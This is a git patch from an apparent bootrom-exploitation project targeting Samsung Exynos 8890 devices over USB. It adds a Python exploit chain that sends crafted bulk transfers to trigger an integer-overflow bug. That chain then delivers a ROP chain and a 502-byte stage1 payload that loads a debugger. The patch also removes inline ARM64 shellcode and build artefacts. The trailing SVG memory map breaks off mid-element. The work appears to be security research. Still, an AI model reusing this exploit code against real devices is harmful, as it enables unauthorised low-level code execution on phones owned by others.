From 934bebe0c5fb645f5df6080bcdfa522d86c66b53 Mon Sep 17 00:00:00 2001
From: Eljakim Herrewijnen <eljakim.herrewijnen@gmail.com>
Date: Mon, 5 Aug 2024 14:51:04 +0200
Subject: [PATCH] stage1 and debugger working

---
 source/exploit/.vscode/launch.json            |   8 +
 source/exploit/Readme.md                      |  17 ++
 source/exploit/dwc3.elf                       | Bin 7920 -> 0 bytes
 source/exploit/dwc3.o                         | Bin 1832 -> 0 bytes
 source/exploit/entry.o                        | Bin 848 -> 0 bytes
 source/exploit/exploit.py                     | 186 ++++++------------
 source/exploit/readme.md                      |   5 -
 source/exploit/stage1/.gitignore              |   3 +
 source/exploit/{ => stage1}/Makefile          |   8 +-
 source/exploit/stage1/Readme.md               |   5 +
 source/exploit/{ => stage1}/entry.S           |   0
 .../{test_dwc3.ld => stage1/linkscript.ld}    |   2 +-
 source/exploit/stage1/memory_map.drawio.svg   |   1 +
 source/exploit/stage1/stage1.c                |  86 ++++++++
 source/exploit/{ => stage1}/symbols.txt       |   0
 source/exploit/test_dwc3.c                    |  72 -------
 16 files changed, 185 insertions(+), 208 deletions(-)
 create mode 100644 source/exploit/Readme.md
 delete mode 100755 source/exploit/dwc3.elf
 delete mode 100644 source/exploit/dwc3.o
 delete mode 100644 source/exploit/entry.o
 delete mode 100644 source/exploit/readme.md
 create mode 100644 source/exploit/stage1/.gitignore
 rename source/exploit/{ => stage1}/Makefile (78%)
 create mode 100644 source/exploit/stage1/Readme.md
 rename source/exploit/{ => stage1}/entry.S (100%)
 rename source/exploit/{test_dwc3.ld => stage1/linkscript.ld} (72%)
 create mode 100644 source/exploit/stage1/memory_map.drawio.svg
 create mode 100644 source/exploit/stage1/stage1.c
 rename source/exploit/{ => stage1}/symbols.txt (100%)
 delete mode 100644 source/exploit/test_dwc3.c

diff --git a/source/exploit/.vscode/launch.json b/source/exploit/.vscode/launch.json
index ed07101..c52f88f 100644
--- a/source/exploit/.vscode/launch.json
+++ b/source/exploit/.vscode/launch.json
@@ -11,6 +11,14 @@
             "program": "exploit.py",
             "console": "integratedTerminal",
             "args": ["--debug"]
+        },
+        {
+            "name": "Run chain",
+            "type": "debugpy",
+            "request": "launch",
+            "program": "exploit.py",
+            "console": "integratedTerminal",
+            "args": []
         }
     ]
 }
\ No newline at end of file
diff --git a/source/exploit/Readme.md b/source/exploit/Readme.md
new file mode 100644
index 0000000..1e2e347
--- /dev/null
+++ b/source/exploit/Readme.md
@@ -0,0 +1,17 @@
+# Exploit
+Python implementation of Frederick's exploit. This gives a bit more insight in the bug.
+
+## Debugger
+The debugger is used for chain loading the next stages. See the documentation folder for more docs
+
+## Usage
+Navigate to stage1 and build it:
+```
+export ANDROID_NDK_ROOT=$TOOLCHAINENV/android-ndk-r21_Linux
+make
+```
+This will build stage1
+
+```bash
+python3 exploit.py
+```
\ No newline at end of file
diff --git a/source/exploit/dwc3.elf b/source/exploit/dwc3.elf
deleted file mode 100755
index 153138950c1b18fc7f5c7a8d230c93173583a341..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 7920
zcmeHMO>7%Q6n?wwq^*!35La!Xzy?}~E#YkJ{McNwrldk5D8;D|LY0>F?j{bhz3%SD
zG&qvoiVDMtC_$zNl%|)~5(lJKs&e2*R7i+Zl|#=Il>^7rJ){!GyxE;i+@<Y-^Q>gQ
zneTn`y_wIm7r*M{)N!8Uz<+qS4({wA&l60hiPH0Q;9^POG1Ciz%k9}s;mBL($D4<|
zq#wakhj;&U^xg;7J$};n_%zEh2bcrQ0p<X6fH}Y%U=A<`m;=lK<^XemIlvrX4loCp
z1Iz*D0CRvj(B(h@Ae@Ga8Gu>_|L|Y^Nl<RJE8jN-oWFbu66teiGi?EuTQgkqeD8(L
z5yX40T)KPdfP6o+=fdVI5RQg$zJlX^jK@M;<VLNQk(VIyyAY19Bk#BbDgOSao9h4@
z-05?fHH;b$8!}AXA{>>MH(E34X1j9Z3aNi@`iJH!e3offxMuqp))u(vN%^AXd|hqy
zb1<@ZNnZI&=#PGJcVhX8{c<wW16yzJhva&vb8-;(SLY$suB4myrhj(zT2H;Oy@Gn!
z*Z6V<bp}qnv@9c!muovUs<>wDt7?PbA7Gu^0z`ezKaFZ*9kCoQr(W!V)1(g3Z|!+w
zo9wra+Haw51lR84Ak}>aQnQ6xWd8$wN0-Gw-8HOx7VG->Z9LZ>SnoX6s|V`&=V@1d
zY?9yPw@#-4@Oef??K?RByVE(4F6x#!uZx4DDM^w>Q({)N4P7*gqLmmM9ZL*r5mC#l
z#W}HTSoS>PshAW?ii0`FDcP?N4XK_$Y|b?2@`i0LSeg;j%)*dknt3g!&KHOB`Eud4
zl4X8mXpR_{#`SSEs|~AhH9MOyW|R6zLK+@VjOk<QxRKT3@ewtik|N^Z&Q_+T-h0QZ
zYnO|WuG{$Vq1$Dm{itq+fL*BIgMLE@wmLz4p9^3%p!4J-@bDvaM3>LQRX6T_`TDB?
z{i8^E276v_9`gEPM3+2q{1DvdpKwut35<QX|6gCF01cBE3I7h&|B&L-7zzK|3I%9T
zDZcc{gE*NIoojSIhiSU%@;L|v_Fs4Lt<K>^N~GZ%j6~;ss&k6smofGs9uDYy=i*zP
zx=D$CFp7?~7&GC>nV1B&qgoC)hV3Z&$66w$!4W++47O3!6<u{yMazO^Xyu)Woi~iq
zE(8m9Rx!$`spRk?=M4+y3`fD`C37A@cWriIb`}!_yvksi1%;>sDW@1ENpZKJIF?$p
zck8;kF0Y_2W(|duu?=UTgo>&T5VIExj+({jSYFKeBgZ)70C|B5xGVqA|35y5OUWJI
z>7DvMAM`YDl4REt>Kc>b0DcHXB9pGi@6TTA!pP8<^W)Qq2>}k7PSXBxG?4Sx`7oLP
m_pJq}KkG5J=>pPIChyc<4+eTX7kgO!8okKBP`)36_5TH#&vmK*

diff --git a/source/exploit/dwc3.o b/source/exploit/dwc3.o
deleted file mode 100644
index bf81e162b085c496f6395244856eb2043e0ae558..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1832
zcmbu9O=uHQ5XUD;YZV1WEeeXR&_hyiyGi<yh~QT71FTl+2O`3{AFoYnvKx0_W2J@m
zX4OlJg5K1FU=D&8@n%K5DB?vBuYwnE*7o4R5NDFN>9UPpe2~n%-^}~ZyxsS9=IGF|
zXe0vuh`>u&o%s|X*S_kjbytNB%v>3MRk;T@N2*hiO7#dVEXN|<=hR0orrg^Wf!_7g
z>fP_LZQZwj9$MJgsb&)GuynE$GLLJub8(m*nTtZUIyG2X8GiHhbxixbym`;ByQqgf
z%%4S_eE<t8=0(-nW{nwKL;A$YevLu5pF?x{<)UhKZ#!J0I;6kcarhVM&!P4S)J@>p
z4H3u^^Y=hCmr;xQr@B(8?n6=6=U;JOe!aO+J%2ydsl`e)1`F?Nwfg|KMpV@PhW_tb
zZ3hh6mh0p#Dc+Y=6s0dK8M?<T$+0Cj-QU-rPMQhHEa>)_RA#Q1N1l}xIU~h$oR_=<
zJw19uKpu0Pu>$j)3D;z@=@fgo;}p!Cp0|4ng>rF!$#uq=$)%JsU=8SonbcFdF`8zh
z8LKy~BnQ&{R=+;L3^SGL)l*p|A;p`m3=Lg4)u`*0?F8=kpJN82ZLm}eC%vnKwlIc|
zbrM~}JCSTzLjex{g`Y>h6`~;FOQf;8VPG6>E1eg}DgTVfyCUoz!Ns&0UljbU2wWES
zf#A=@e7mr8Fk02!DdM}Z&%l*}i-O~wfepeZb4B=_AwDTM>2wI6%&hRk`tt!Ed<%40
zXi)y9hFkytAbjd)V}O4VKJ^piKLii=<9|$u2kW-soJP1V$Sy1BGG~(<=p+}J&B3~E
zrZrYlG>_{p*SM?O9!z+K#>yDha(E32%!M(=HD+5SCy&r&W?3^PMn^GF#ESs3?QkX^
zKYe~bs+d<1-Y}R(Djwq#C0w9ez?sK2DkqyzSFm)hYo-An3TysE_PEP+17z<;k!&+_
zH4VBfISE~pveMY+|NcKgfmjQXdGSy`g<|6IHt9O_h>;BrRZI?s76jiFrBFD`h?hiD
z{=Fl8y3Ok;h{Hecbhbz%{5YmXUAm9K;kV=4OBnS1U|w?Vr=uPY=RQN)Dm5cuMl2vh
I`waL02WHO{761SM

diff --git a/source/exploit/entry.o b/source/exploit/entry.o
deleted file mode 100644
index cfc037fa6b657a879d0579fb87669bfafc66cd97..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 848
zcmb<-^>JfjWMqH=MuzPS2p&w7f#Cv@paWRgfq@O8QpAyAK@bB&Ll6@K!;}Ne@z?%V
z?_J3Z<SWN87&|sK2K{AbnD{xEab+vp%u6Ofan==!J}nY=_{qXP^O72ah!zWwKN-jt
z2GY(fjGBiV8iE{Z7&IR+i)bwbs&g}7uw?q#a%mw0!%oJ+rl9#iI+=-KrvroiHISM_
zCWoD$gB@4?tv<X0WIw{ym@H4Q5YVM)fCq=T5KvqIO)ZG44i;x(U_p~JfQpNtiNm;3
zz;I-SaX_?QQEE=2UP)?22}5y7Vo?c0ZenI0gI->KNvfW^U#KonFgcr{C_gv8I5jVY
zp|m&&!q6)&DJn@!V$dtD%mvXZ6?!1MDFv2515n%tHLw91|9)r|K!xF=Y(N%B3`8RX
z2PkI>vLKL+9)2Lb=wcu(8BmKPKpY@o1!7Pva)3BM023DnveDfHlD`5XumE(mjzBe-
Use^&x22}3^C=JpF3MX{?0TQ=c82|tP

diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index d6cbd79..e20d448 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -3,6 +3,7 @@ import struct, sys, usb1, libusb1, ctypes, usb, argparse
 from keystone import *
 from capstone import *
 from ghidra_assistant.utils.utils import *
+from ghidra_assistant.concrete_device import *
 
 def p32(x):
     return struct.pack("<I", x)
@@ -35,6 +36,9 @@ TARGET_OFFSETS = {
 ENDPOINT_BULK_IN = 0x81
 ENDPOINT_BULK_OUT = 0x2
 
+ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
+cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
+
 class ExynosDevice():
 
     def __init__(self, idVendor=0x04e8, idProduct=0x1234):
@@ -58,27 +62,22 @@ class ExynosDevice():
 
         print("Connected device!")
 
-    def write(self, data, size=-1):
-        transfered = 0
+    def write(self, data):
         transferred = ctypes.c_int()
-        if size == -1:
-            size = len(data)
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
-        assert(res == 0)
-        return transfered
+        assert(res == 0), "Could not perform bulk transfer"
+        return res
 
     def send_empty_transfer(self):
-        transfered = 0x200
         transferred = ctypes.c_int()
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
         assert(res == 0)
-        return transfered
+        return transferred.value
     
     def test_bug_2(self):
-        # Also bug here
-        # payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
-        # self.write(payload, MAX_PAYLOAD_SIZE)
-        # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
+        '''
+        Interger overflow in last packet if reamining size is 1.
+        '''
         
         transferred = ctypes.c_int()
         bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
@@ -103,7 +102,7 @@ class ExynosDevice():
         payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
 
         assert (len(payload) == BLOCK_SIZE)
-        self.write(payload, MAX_PAYLOAD_SIZE) 
+        res = self.write(payload, MAX_PAYLOAD_SIZE) 
 
         for i in range(200):            
             print(hex(self.send_empty_transfer()))
@@ -112,6 +111,9 @@ class ExynosDevice():
         sys.exit(0)
         
     def send_normal(self, payload):
+        '''
+        TODO not working
+        '''
         # construct dl_data
         payload = struct.pack("<II", 0, len(payload)) #+ (payload + b"\x00"  * 2)
         transferred = ctypes.c_int()
@@ -120,6 +122,9 @@ class ExynosDevice():
         pass
 
     def exploit(self, payload: bytes):
+        '''
+        Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload
+        '''
         current_offset = TARGET_OFFSETS[self.target][0]
         transferred = ctypes.c_int()
         
@@ -166,110 +171,49 @@ class ExynosDevice():
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
         assert res == 0, "Error sending ROP chain"
         
+    def usb_write(self, data):
+        assert len(data) <= 0x200, "Data too big"
+        transferred = ctypes.c_int()
+        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
+        assert res == 0, "Error sending data"
+        assert transferred.value == len(data), "Invalid transfered size"
+        return transferred.value
+
+    def usb_read(self, size):
+        transferred = ctypes.c_int()
+        buf = ctypes.c_buffer(b"", size)
+        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 0)
+        assert res == 0, "Error receiving data"
+        return buf.raw[:transferred.value]
+
+    def run_boot_chain(self):
+        stage1 = open("stage1/stage1.bin", "rb").read()
+        self.exploit(stage1)
+        
+        def run_debugger():
+            # TODO, hardcoded path
+            debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
+            debugger += ((0x2000 - len(debugger)) * b"\x00")
+            assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
+            for block in range(0, len(debugger), 0x200):
+                self.usb_write(debugger[block:block+0x200])
+            assert self.usb_read(0x200) == b"GiAs", "No response from debugger"
+            
+            # Test basic functionality
+            self.usb_write(b"PING")
+            r = self.usb_read(0x200)
+            assert r == b"PONG", f"Invalid response from device: {r}"
+        
+        run_debugger()
+        
         
 
-
-ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
-cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
 def usb_debug():
-    shellcode = f"""
-    start:
-    adr x0, test_fun
-    ldr x0, [x0]
-    blr x0
+    '''
+    Function to debug USB behavior
+    '''
     
-    mov	w1, #0x20000 // size
-	mov w0, #0x0 // address
-	bl usb_send
-    mov x0, #0
-    br x0 //reset
-    
-    #Setup read usb
-    mov w0, #0x2
-    adr x1, shellcode_base
-    ldr x1, [x1]
-    mov w2, #0x02020000
-    add w2, w2, #0x2000
-    # endpoint, cb, buffer
-    adr x5, maybe_usb_setup_read
-    ldr x5, [x5]
-    blr x5
-
-    
-    # Get something?? arg0 is endpoint
-    mov w0, #0x2
-    adr x1, maybe_read_size_endpoint
-    ldr x1, [x1]
-    blr x1
-    
-    
-    # # Send some data from ROM
-	# mov	w1, #0x200 // size
-	# mov w0, #0x0 // address
-	# bl usb_send
-    # mov x0, #0
-    # br x0 //reset
-    
-    
-    # # dwc3_ep0_start_trans
-    # mov w1, w0
-    # mov w0, #0x2
-    # mov w2, #0x200
-    # adr x5, dwc3_ep0_start_trans
-    # ldr x5, [x5]
-    # blr x5
-    
-    # # Send some data from ROM
-	# mov	w1, #0x200 // size
-	# mov w0, #0x0 // address
-	# bl usb_send
-    # mov x0, #0
-    # br x0 //reset
-    
-    usb_send:
-	stp	x29, x30, [sp,#-48]!
-	mov	w3, #0x0
-	bfxil	w3, w1, #0, #24
-	mov	w1, #0xc12
-	mov	x29, sp
-	stp	x19, x20, [sp,#16]
-	mov	x5, #0xc834
-	mov	w20, #0x1
-	movk	x5, #0x1540, lsl #16
-	ldr	x2, [x29,#40]
-	mov	x4, #0xc838
-	orr	w6, w1, w20
-	movk	x4, #0x1540, lsl #16
-	mov	x19, #0xc83c
-	movk	x19, #0x1540, lsl #16
-	stp	w3, w1, [x2,#8]
-	mov	w3, #0x406
-	stp	w0, wzr, [x2]
-	mov	w0, w20
-	ldr	x1, [x29,#40]
-	strb	w6, [x2,#12]
-	mov	x2, #0x27c8
-	str	w1, [x5]
-	mov	w1, #0x1388
-	str	wzr, [x4]
-	str	w3, [x19]
-	blr	x2
-	mov	w0, w20
-	ldr	w1, [x19]
-	ldp	x19, x20, [sp,#16]
-	ldp	x29, x30, [sp],#48
-	ret
-
-    usb_read_endpoint: .quad 0x00006654
-    maybe_usb_setup_read: .quad 0x00006f88
-    shellcode_base: .quad 0x02021800
-    maybe_read_size_endpoint: .quad 0x00007a7c
-    dwc3_ep0_start_trans: .quad 0x0000791c
-    test_fun: .quad 0x000064e0
-"""
-    shellcode = ks.asm(shellcode, as_bytes=True)[0]
-    
-    shellcode = open("dwc3.bin", "rb").read()
+    shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
     assert len(shellcode) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
     
     exynos = ExynosDevice()
@@ -302,20 +246,10 @@ def usb_debug():
 
 if __name__ == "__main__":
     arg = argparse.ArgumentParser("Exynos exploit")
-    arg.add_argument("--debug", action="store_true")
+    arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
     args = arg.parse_args()
     if args.debug:
         usb_debug()
-        sys.exit
-    # usb_debug()
-    # sys.exit(0)
-    # wait_for_device()
+        sys.exit(0)
     exynos = ExynosDevice()
-    exynos.send_normal(open("S7/fwbl1.bin", 'rb').read())
-    sys.exit()
-    # exynos.test_bug_2()
-    sys.exit(0)
-    path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
-    # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
-    exynos.exploit(open(path, "rb").read())
-    pass
+    exynos.run_boot_chain()
diff --git a/source/exploit/readme.md b/source/exploit/readme.md
deleted file mode 100644
index 7d40077..0000000
--- a/source/exploit/readme.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# Exploit
-
-## test_dwc3
-simple dwc3 usb implementation to send/receive data.
-
diff --git a/source/exploit/stage1/.gitignore b/source/exploit/stage1/.gitignore
new file mode 100644
index 0000000..d6bc0df
--- /dev/null
+++ b/source/exploit/stage1/.gitignore
@@ -0,0 +1,3 @@
+*.o
+*.bin
+*.elf
\ No newline at end of file
diff --git a/source/exploit/Makefile b/source/exploit/stage1/Makefile
similarity index 78%
rename from source/exploit/Makefile
rename to source/exploit/stage1/Makefile
index 28d2fe1..3ddaa87 100644
--- a/source/exploit/Makefile
+++ b/source/exploit/stage1/Makefile
@@ -10,8 +10,8 @@ LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linu
 #==================Target Samsung S7 (8890)==================
 CFLAGS_SAMSUNGS7 = -Os
 
-dwc3:
+stage1:
 	$(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
-	$(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
-	$(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
-	$(OBJCOPY) -O binary dwc3.elf dwc3.bin
+	$(CC) $(CFLAGS_SAMSUNGS7) -c stage1.c -o stage1.o
+	$(LD) -T linkscript.ld entry.o stage1.o -o stage1.elf --just-symbols=symbols.txt
+	$(OBJCOPY) -O binary stage1.elf stage1.bin
diff --git a/source/exploit/stage1/Readme.md b/source/exploit/stage1/Readme.md
new file mode 100644
index 0000000..e360401
--- /dev/null
+++ b/source/exploit/stage1/Readme.md
@@ -0,0 +1,5 @@
+# Stage 1
+Stage 1 is responsible for loading the debugger.
+
+## Memory map
+![memory map](memory_map.drawio.svg)
\ No newline at end of file
diff --git a/source/exploit/entry.S b/source/exploit/stage1/entry.S
similarity index 100%
rename from source/exploit/entry.S
rename to source/exploit/stage1/entry.S
diff --git a/source/exploit/test_dwc3.ld b/source/exploit/stage1/linkscript.ld
similarity index 72%
rename from source/exploit/test_dwc3.ld
rename to source/exploit/stage1/linkscript.ld
index d2991ee..74b44da 100644
--- a/source/exploit/test_dwc3.ld
+++ b/source/exploit/stage1/linkscript.ld
@@ -1,5 +1,5 @@
 MEMORY {
-    ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
+    ROM (rwx): ORIGIN = 0x02021800, LENGTH = 502
 }
 
 SECTIONS
diff --git a/source/exploit/stage1/memory_map.drawio.svg b/source/exploit/stage1/memory_map.drawio.svg
new file mode 100644
index 0000000..d2bcab0
--- /dev/null
+++ b/source/exploit/stage1/memory_map.drawio.svg
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="416px" height="881px" viewBox="-0.5 -0.5 416 881" content="&lt;mxfile host=&quot;04n1rgtnob7ebrhhg57mh2mjuh68d4qe61ncs1a2e1n2no0ifp02&quot; modified=&quot;2024-08-05T12:47:06.961Z&quot; agent=&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Code/1.90.2 Chrome/122.0.6261.156 Electron/29.4.0 Safari/537.36&quot; etag=&quot;ooYiCx-Y0vAI6hYQjlG1&quot; version=&quot;12.2.4&quot; pages=&quot;1&quot;&gt;&lt;diagram id=&quot;0IquIawZrpi2rh_0flRx&quot; name=&quot;Page-1&quot;&gt;3VjbjpswFPwapPZhJYO5vm42m/YhqtRo1cfK4EOgS3BkTC79+prEbKB2tZVqiNQoEmZswDOegQMOXuxOK072xZpRqBwP0ZODnxzPc70kkZsOOSskQgrZ8pIq7AZsyp+gQKTQtqTQjAYKxipR7sdgxuoaMjHCCOfsOB6Ws2p81T3ZggZsMlLp6LeSiuKKxgG64Z+g3Bb9lV2kenakH6yApiCUHQcQXjp4wRkT19butICqU6/X5Xrc8x963ybGoRZ/c4B3PeBAqlZxU/MS554sZ21NoRuPHPx4LEoBmz3Jut6jXF+JFWJXyT1XNvOyqhasYvxyLM5zCLNM4o3g7BUGPTRKUtSdUJ+xInEALuA0gBSDFbAdCH6WQ/peX6mp/PQQq/3jbXFw751isDBxpECiDLF9O/dNM9lQspklxJqELxvJCj2xY10xQmUzbaUQ3KqylECcG5UNsxjS3JKywVjZUBfWSwzC4tCCsL4mLDohD3lu3MdpoKUkJMaCWaDvB8GIfqDTN7K3QD4wk48Qmo18OF57HwWzsQ819o2QN1U5YfQhQF1XehbQfLQbqQBi6psiFXspDkNLkQrfj1RkkNWzIGtkMFUXKHKvQBlu1PFEloqN3MMc7pUnPCP5/uE3YN826XcO2WHweJLZcv+rbPloxnC5rqbxxWHJjHfscbreap45HKaXQat2/wM6V6FTeNHgaiy55dAAPwC16zFwpcsik8eSMMJkIo9hT38sGj3W3/r+SWW9JnqpX2tZaUrw83q5dvCz3dy+X2ZuOaGl1HNU9ne/aUpQ3zNkerIa1NUrERnqTmXj/y4xjwwlxFSFmauXEI/yZfXrl7VV2+VxBub3xjQO/MDWe+Nv1jK9NxqVtOIsU0Fyp1LkIZnMQXL39jXj0jf4KISXvwA=&lt;/diagram&gt;&lt;/mxfile&gt;"><defs><linearGradient x1="0%" y1="0%" x2="0%" y2="100%" id="mx-gradient-dae8fc-1-ffffff-1-s-0"><stop offset="0%" style="stop-color:#dae8fc"/><stop offset="100%" style="stop-color:#ffffff"/></linearGradient></defs><g><rect x="0" y="10" width="310" height="870" fill="#ffe6cc" stroke="#d79b00" pointer-events="all"/><rect x="10" y="150" width="290" height="360" fill="#dae8fc" stroke="#6c8ebf" pointer-events="all"/><g transform="translate(97.5,323.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="115" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 116px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">USB Download buffer</div></div></foreignObject></g><rect x="315" y="140" width="90" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(316.5,146.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="66" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x02021800</div></div></foreignObject></g><rect x="320" y="495" width="90" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(321.5,501.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="66" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x02070000</div></div></foreignObject></g><rect x="20" y="150" width="270" height="20" fill="#d5e8d4" stroke="#82b366" pointer-events="all"/><g transform="translate(105.5,153.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="99" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 100px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">stage1 (502 bytes)</div></div></foreignObject></g><rect x="315" y="170" width="80" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(316.5,176.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="59" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x2021a00</div></div></foreignObject></g><rect x="320" y="470" width="80" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(321.5,476.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="56" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x206fe00</div></div></foreignObject></g><rect x="20" y="490" width="270" height="20" fill="#d5e8d4" stroke="#82b366" pointer-events="all"/><g transform="translate(81.5,493.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="146" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 147px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">usb_recv buffer (512 bytes)</div></div></foreignObject></g><rect x="325" y="400" width="80" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(326.5,406.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="59" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x2069000</div></div></foreignObject></g><rect x="20" y="415" width="270" height="55" fill="#e1d5e7" stroke="#9673a6" pointer-events="all"/><g transform="translate(72.5,436.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="165" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 166px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Gupje (0x6000 bytes reserved)</div></div></foreignObject></g><rect x="10" y="510" width="290" height="360" fill="url(#mx-gradient-dae8fc-1-ffffff-1-s-0)" stroke="#6c8ebf" pointer-events="all"/><g transform="translate(109.5,683.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="91" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 92px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Unknown IMEM?</div></div></foreignObject></g><rect x="325" y="850" width="90" height="30" fill="none" stroke="none" pointer-events="all"/><g transform="translate(326.5,856.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="73" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">0x2????????</div></div></foreignObject></g><rect x="10" y="10" width="290" height="60" fill="#f8cecc" stroke="#b85450" pointer-events="all"/><g transform="translate(128.5,33.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="53" height="12"><div 